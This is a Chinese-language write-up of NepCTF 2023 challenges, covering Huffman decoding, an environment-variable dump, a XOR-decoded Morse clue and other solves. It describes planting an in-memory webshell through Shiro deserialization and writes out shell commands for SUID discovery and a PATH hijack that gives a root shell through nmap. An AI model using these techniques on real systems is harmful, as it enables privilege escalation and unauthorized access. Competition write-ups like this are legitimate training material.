CheckIn

签到,直接出

1

与AI共舞的哈夫曼

打开发现是哈夫曼编码,提示ai,直接用ai生成即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import heapq
import os

class HuffmanNode:
    def __init__(self, char, freq):
        self.char = char
        self.freq = freq
        self.left = None
        self.right = None

    def __lt__(self, other):
        return self.freq < other.freq

def build_huffman_tree(frequencies):
    heap = [HuffmanNode(char, freq) for char, freq in frequencies.items()]
    heapq.heapify(heap)

    while len(heap) > 1:
        left = heapq.heappop(heap)
        right = heapq.heappop(heap)
        merged = HuffmanNode(None, left.freq + right.freq)
        merged.left = left
        merged.right = right
        heapq.heappush(heap, merged)

    return heap[0]

def build_huffman_codes(node, current_code, huffman_codes):
    if node is None:
        return

    if node.char is not None:
        huffman_codes[node.char] = current_code
        return

    build_huffman_codes(node.left, current_code + '0', huffman_codes)
    build_huffman_codes(node.right, current_code + '1', huffman_codes)

def compress(input_file, output_file):
    with open(input_file, 'rb') as f:
        data = f.read()

    frequencies = {}
    for byte in data:
        if byte not in frequencies:
            frequencies[byte] = 0
        frequencies[byte] += 1

    root = build_huffman_tree(frequencies)
    huffman_codes = {}
    build_huffman_codes(root, '', huffman_codes)

    compressed_data = ''
    for byte in data:
        compressed_data += huffman_codes[byte]

    padding = 8 - len(compressed_data) % 8
    compressed_data += '0' * padding

    with open(output_file, 'wb') as f:
        # Write frequency information
        f.write(bytes([len(frequencies)]))
        for byte, freq in frequencies.items():
            f.write(bytes([byte, (freq >> 24) & 0xFF, (freq >> 16) & 0xFF, (freq >> 8) & 0xFF, freq & 0xFF]))

        # Write compressed data
        for i in range(0, len(compressed_data), 8):
            byte = compressed_data[i:i+8]
            f.write(bytes([int(byte, 2)]))
            
def decompress(input_file, output_file):
    with open(input_file, 'rb') as f:
        # Read frequency information
        num_freqs = f.read(1)[0]
        frequencies = {}
        for _ in range(num_freqs):
            byte = ord(f.read(1))
            freq = (ord(f.read(1)) << 24) | (ord(f.read(1)) << 16) | (ord(f.read(1)) << 8) | ord(f.read(1))
            frequencies[byte] = freq

        # Build Huffman tree
        root = build_huffman_tree(frequencies)

        # Read compressed data
        compressed_data = f.read()
        bit_stream = ''.join(format(byte, '08b') for byte in compressed_data)

        # Decode compressed data using Huffman tree
        decoded_data = []
        current_node = root
        for bit in bit_stream:
            if bit == '0':
                current_node = current_node.left
            else:
                current_node = current_node.right

            if current_node.char is not None:
                decoded_data.append(current_node.char)
                current_node = root

        # Write decompressed data to output file
        with open(output_file, 'wb') as out_f:
            out_f.write(bytearray(decoded_data))

if __name__ == "__main__":
    compressed_file = 'compressed.bin'
    decompressed_file = 'decompressed.txt'
    # 解压缩文件
    decompress(compressed_file, decompressed_file)

生成decompressed.txt,打开即可得到flag

image-20230813190438829

codes

提示flag在环境变量中

发现envsys等字符串被过滤了

使用main函数的第三个参数,变量环境变量即可

1
2
3
4
5
6
7
8
9
#include <stdio.h> 

int main(int argc, char *argv[], char * e[]) 
{ 
    int i; 
    for (i = 0; e[i] != NULL; i++) 
        printf(e[i]); 
    return 0; 
}

image-20230813190521001

陌生的语言

1

发现奇怪的语言,结合题目

直接谷歌图片搜索一下

QQ图片20230812150358

QQ图片20230812150348

得到

1
NEPNEPABELIEVINGHEARTISYOURMAGIC

NepCTF{NEPNEP_A_BELIEVING_HEART_IS_YOUR_MAGIC}

小叮弹钢琴

用Audacity打开音频

image-20230812150617939

猜测是摩斯编码

后面还有一排0x字符串

image-20230812150654631

根据摩斯解出来的提示,进行XOR

1
2
3
4
5
6
7
8
encode = '37 0a 05 30 3c 29 0e 04 50 05 03 1c 2b 18 58 47 3a 5f 05 21 17 03 2c 39 23 0f 00 5d 1e 17'
key = 'y o u s h o u l d u s e t h i s t o x o r s o m e t h i n g'
lis = encode.split(' ')
key_lis = key.split(' ')
flag = ''
for i in range(len(lis)):
    flag += chr(int(lis[i],16)^ord(key_lis[i]))
print(flag)

image-20230813190621211

ez_java_checkin

image-20230812155841136

shiro框架的反序列化

爆破构造链,容器很容易就挂掉,手动试了一下就出来

写入内存马

image-20230812160333968

蚁剑连接一下,发现没有权限访问flag

在start.sh找到flag

image-20230812160444629

ConnectedFive

nc交互一下,玩着玩着分数够了就win

image-20230812181914847

独步天下-转生成为镜花水月中的王者

nc 连接一下

根据提示的环境变量提权

1
find / -perm -u=s -type f

搜索SUID文件

image-20230812222834639

发现了/bin目录下的nmap

image-20230812222927512

执行一下

image-20230812223020073

调用了系统指令ports-alive

1
2
3
4
5
6
7
8
cd /tmp    
echo "/bin/sh" > ports-alive 
chmod 777 ports-alive
echo $PATH 
export PATH=/tmp:$PATH 
cd /bin
./nmap 127.0.0.1
cat /flag

image-20230812223450714